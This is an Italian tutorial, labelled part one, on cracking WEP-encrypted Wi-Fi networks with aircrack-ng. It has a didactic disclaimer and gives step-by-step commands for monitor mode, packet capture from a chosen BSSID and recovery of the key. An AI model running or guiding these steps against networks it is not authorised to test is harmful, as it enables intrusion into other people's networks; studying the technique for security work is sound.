***
Note: La presente guida è pubblicata esclusivamente a scopo didattico. Collegarsi a reti wireless senza l’autorizzazione del proprietario costituisce reato punibile penalmente. Il WEP è stato dichiarato non sicuro da anni, la sua diffusione attuale è molto limitata. Se la vostra rete wireless è cifrata utilizzando il WEP dovreste immediatamente proteggervi utilizzando la cifratura WPA o WPA2. Gli output del terminale sono stati in alcuni casi semplificati rimuovendo informazioni non rilevanti allo scopo di migliorare leggibilita’ e comprensione della guida.
***
Guida rapida al wireless cracking (WEP) – Prima parte
Per craccare una rete wireless con cifratura WEP sono sufficienti un pc dotato di scheda di rete Wi-Fi e un programma di nome aircrack-ng (ng sta per New Generation, essendo questa una versione aggiornata e piu’ evoluta di aircrack).
1) Installare aircrack-ng:
sudo apt-get install aircrack-ng
2) Avviare la modalita’ di monitoraggio (monitor mode):
Prima occorre disabilitare la scheda wireless:
sudo airmon-ng stop wlan0
Poi va riavviata in monitor mode:
sudo airmon-ng start wlan0
Nell’esempio il nome della scheda di rete è wlan0. Su un pc dotato di una scheda ethernet piu’ una wireless solitamente il nome è wlan0. Per trovare il nome della scheda di rete digitare da terminale il seguente comando:
ifconfig -a
Ecco l’output:
$ ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:00:00:00:00:00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:22937 errors:0 dropped:0 overruns:0 frame:0
TX packets:19393 errors:0 dropped:0 overruns:0 carrier:1
collisions:0 txqueuelen:1000
RX bytes:22963442 (22.9 MB) TX bytes:2411958 (2.4 MB)
wlan0 Link encap:Ethernet HWaddr 00:00:00:00:00:00
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
3) Visualizziamo le reti wireless intorno a noi con il comando:
sudo airodump-ng wlan0
Come si vede ci sono due reti, una con cifratura WPA mentre l’altra usa il WEP. I dati interessanti ai fini di questa guida sono:
* il campo BSSID, che mostra gli indirizzi MAC dei router/ap
* CH che è il canale di trasmissione
* ESSID che è il nome della rete wireless

Individuata la rete da attaccare, possiamo metterci all’opera iniziando a sniffare i pacchetti con:
sudo airodump-ng -c x –bssid xx:xx:xx:xx:xx:xx -w dump wlan0
Inserire al posto delle x i valori corretti di canale (CH) e BSSID.
Una volta sniffato un numero sufficiente di pacchetti, lanciare aircrack-ng sul file .cap generato nella home utente da airodump-ng:
sudo aircrack-ng -b xx:xx:xx:xx:xx:xx dump-01.cap

Ed ecco la chiave in formato HEX.